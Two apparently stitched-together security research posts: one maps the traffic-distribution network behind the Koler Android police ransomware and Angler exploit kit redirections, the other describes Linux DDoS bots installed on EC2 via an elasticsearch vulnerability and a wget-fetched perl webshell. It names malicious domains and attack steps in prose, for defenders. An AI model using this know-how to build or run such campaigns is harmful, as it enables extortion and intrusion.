At the beginning of May 2014 a security researcher named Kaffeine made the first public mention of Trojan.AndroidOS.Koler.a, a ransomware program that blocks the screen of an infected device and requests a ransom of between $100 and $300 in order to unlock the device. It doesn't encrypt any files or perform any kind of advanced blocking of the target device other than blocking the screen.
The malware displays a localized message from the police!
It has customized messages for the following countries:Australia
As of July 23, the mobile part of the campaign has been disrupted and the Command and Control server has started sending an "Uninstall" request to victims.
In this post, instead of focusing on the mobile application itself – we highlight some details at the end – we want to shed light on its distribution infrastructure. An entire network of malicious porn sites linked to a traffic direction system that redirects the victim to different payloads targeting not only mobile devices but any other visitor. That includes redirections to browser-based ransomware and what we think is an "Angler" exploit kit distribution network.
The diagram below illustrates the bigger picture of the infrastructure used.
The main findings can be summarized as follows:
- Distribution: TDS (Traffic Distribution System)
- Main controller: video-sartex.us (TDS Controller)
- Malicious porn sites (redirector): 49 domains detected
- Exploit kit websites: 700+ URLs (200+ domains)
- Browser-based screen-lock domains: 49 domains detected
- Mobile infection domain: video-porno-gratuit.eu
- Mobile Current C2: policemobile.biz.
- Traffic: almost 200,000 visitors to the mobile infection domain
- 80% of visitors from the US
The use of a pornographic network for this "police" ransomware is no coincidence: the victims are more likely to feel guilty about browsing such content and pay the alleged fine from the authorities. This psychological factor can be the difference between a failed campaign and a successful one.
With regards to the malicious mobile application, we have found different APKs with the same behavior. Some of them (not yet distributed through this malicious network) have interesting names such as PronHub.com.Apk, whatsapp.apk or updateflash.apk.
This suggests the attackers could expand their campaign in the near future.Mobile payload distribution
The mobile infection is triggered when the user visits specific pornographic sites from an Android device. Those sites are part of the distribution network created for this campaign and will redirect the victims to a landing page that contains an APK file called animalporn.apk.
All the porn sites in the campaign redirect their traffic to the same server: hxxp://video-porno-gratuit.eu. This domain hosts the malicious APK.
When visited, the website automatically redirects the user to the malicious application. The user still has to confirm the download and installation of the application on their device.
We were able to obtain the statistics showing the geographical distribution of visitors to this malicious site:
According to the same stats, we see that the campaign started and reached peak activity in April 2014.Redirectors: The malicious porn network
The pornographic sites of the network are not compromised sites. They all look the same, have the same HTML infrastructure and don´t provide their own pornographic material.
We identified a total of 48 domains in this porn redirecting network.
Almost all the websites used in this infrastructure were created using the same template – in many cases using templates from the legitimate site Tubewizardpro and Webloader for the external resources.
All the content (mainly videos and pictures) on these porn sites is loaded from external sources using Webloader.
Basically, all the porn sites redirect to the "controller" domain videosartex.us.
Videosartex.us then performs a redirect based on the parameter in the URL, the referrer, the user agent and the geographical location of the visitor's IP.
If the IP belongs to any of the 30 affected countries and the user-agent belongs to an Android device, the visitor is redirected to the APK at video-porno-gratuit.eu.
In other cases, the user is either redirected to a porn site on the network, to a screen-locker or to an exploit kit. The attackers use Keitaro TDS (Traffic Distribution System) to redirect users.Non-mobile payloads
During our analysis we noticed that some domains showed ransomware-themed pop-ups to non-mobile victims. These additional servers are used when the controller (videosartex) detects the following two conditions:
- The request contains no Internet Explorer user agent.
- The request is from one of the 30 affected countries, but it doesn't contain an Android user agent.
In this case, the victim is redirected to any of the browser ransomware websites, while a blocking screen identical to the one used for mobiles is displayed on the victim's computer. There is no infection in this case, just a pop-up showing a blocking template.
The following images are examples of the headers used in the ransomware pop-ups:
The redirection infrastructure used in this campaign contained one final surprise; redirecting visitors using Internet Explorer to sites hosting the Angler exploit kit, which has exploits for Silverlight, Adobe Flash and Java.
The following is an example of such a redirection:
We detected more than 200 domains used for hosting this exploit kit.
During our analysis, the exploit code was not fully functional and it didn´t deliver any payload.Conclusions
Ransomware for mobile devices appeared on almost every prediction list for 2014. We are not dealing with the most advanced families here such as cryptolocker for Windows. The ransomware is fairly basic, but sufficient to annoy the victim.
Of most interest is the distribution network used in the campaign. Dozens of automatically generated websites redirect traffic to a central hub where users are redirected again. Depending on a number of conditions, this second redirection could be to a malicious Android application, to browser-based ransomware or to a website with the Angler Exploit Kit.
We believe this infrastructure demonstrates just how well organized and dangerous these campaigns are that are currently targeting, but not limited to, Android users. The attackers can quickly create similar infrastructure thanks to full automation, changing the payload or targeting different users. The attackers have also thought up a number of ways for monetizing their campaign income in a truly multi-device scheme.
A couple weeks ago, my colleague Mikhail K posted on the "versatile linux DDoS trojan", with analysis of several bots, including a bot implementing some extraordinary DNS amplification DDoS functionality. Operators of these bots are currently active, and we observe new variants of the trojan building bigger botnets.
Let's explore some additional offensive details of this crew's activity, and details of the overall situation, in the past week. In general, the DDoS trojans are being distributed to fire on victim profiles that seem to indicate purely cybercrime activity. The compromised hosts used to run the bots we observed have been running Amazon EC2 instances, but of course, this platform is not the only one being attacked and mis-used. It's also interesting that operators of this botnet apparently have no problem working with CN sites, as demonstrated by their use of the site hosting their tools since late 2013. Seven of their eight tools hosted here were uploaded in the past couple of weeks, coinciding with their updated attack activity. Their repository includes recent (cve-2014-0196) and older (cve-2012-0056) Linux escalation of privilege exploit source code, likely compiled on the compromised hosts only when higher privileges are necessary, along with compiled offensive sql tools (Backdoor.Linux.Ganiw.a), multiple webshell (Backdoor.Perl.RShell.c and Backdoor.Java.JSP.k) and two new variants of the "versatile bots" (Backdoor.Linux.Mayday.g), the udp-only "xudp" code being the newer of the two:
But first, how are they getting in to EC2 instances and running their linux DDoS bots from the cloud? They are actively exploiting a known, recent elasticsearch vulnerability in all versions 1.1.x (cve-2014-3120), which happens to still be in active commercial deployment for some organizations. If you are still running 1.1.x, upgrade to the latest 1.2 or 1.3 release, which was released a couple of days ago. Dynamic scripting is disabled by default, and other features added to help ease the migration. From a couple of incidents on Amazon EC2 customers whose instances were compromised by these attackers, we were able to capture very early stages of the attacks. The attackers re-purpose known cve-2014-3120 proof-of-concept exploit code to deliver a perl webshell that Kaspersky products detect as Backdoor.Perl.RShell.c. Linux admins can scan for these malicious components with our server product.
Gaining this foothold presents the attacker with bash shell access on the server. The script "pack.pl" is fetched with wget and saved from the web host above to /tmp/zerl and run from there, providing the bash shell access to the attacker. Events in your index logs may suggest your server has fallen to this attack:
Hosted on the same remote server and fetched via the perl webshell are the DDoS bots maintaining new encrypted c2 strings, detected as Backdoor.Linux.Mayday.g. One of the variants includes the DNS amplification functionality described in Mikhail's previous post. But the one in use on compromised EC2 instances oddly enough were flooding sites with UDP traffic only. The flow is strong enough that the DDoS'd victims were forced to move from their normal hosting operations ip addresses to those of an anti-DDoS solution. The flow is also strong enough that Amazon is now notifying their customers, probably because of potential for unexpected accumulation of excessive resource charges for their customers. The situation is probably similar at other cloud providers. The list of the DDoS victims include a large regional US bank and a large electronics maker and service provider in Japan, indicating the perpetrators are likely your standard financially driven cybercrime ilk.